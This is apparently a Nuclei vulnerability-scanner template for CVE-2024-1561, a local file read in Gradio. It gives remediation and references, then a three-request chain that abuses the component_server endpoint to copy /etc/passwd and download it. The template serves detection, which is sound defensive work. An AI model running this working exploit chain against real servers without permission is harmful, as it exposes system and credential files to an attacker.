id: CVE-2024-1561
info:  name: Gradio Applications - Local File Read  author: Diablo  severity: high  description: |    Local file read by calling arbitrary methods of Components class  impact: |    Successful exploitation of this vulnerability could allow an attacker to read files on the server  remediation: |    Update to Gradio 4.13.0  reference:    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338    - https://github.com/DiabloHTB/CVE-2024-1561    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2  classification:    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N    cvss-score: 7.5    cve-id: CVE-2024-1561    cwe-id: CWE-29    epss-score: 0.00045    epss-percentile: 0.14639  metadata:    verified: true    max-request: 3    shodan-query: html:"__gradio_mode__"  tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
flow: http(1) && http(2) && http(3)
http:  - raw:      - |        GET /config HTTP/1.1        Host: {{Hostname}}
    extractors:      - type: json        name: first-component        part: body        group: 1        json:          - '.components[0].id'        internal: true
  - raw:      - |        POST /component_server HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json
        {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
    extractors:      - type: regex        name: tmpath        regex:          - \/[a-zA-Z0-9\/]+        internal: true
  - raw:      - |        GET /file={{tmpath}} HTTP/1.1        Host: {{Hostname}}
    matchers:      - type: dsl        dsl:          - regex('root:.*:0:0:', body)          - 'contains(header, "text/plain")'        condition: and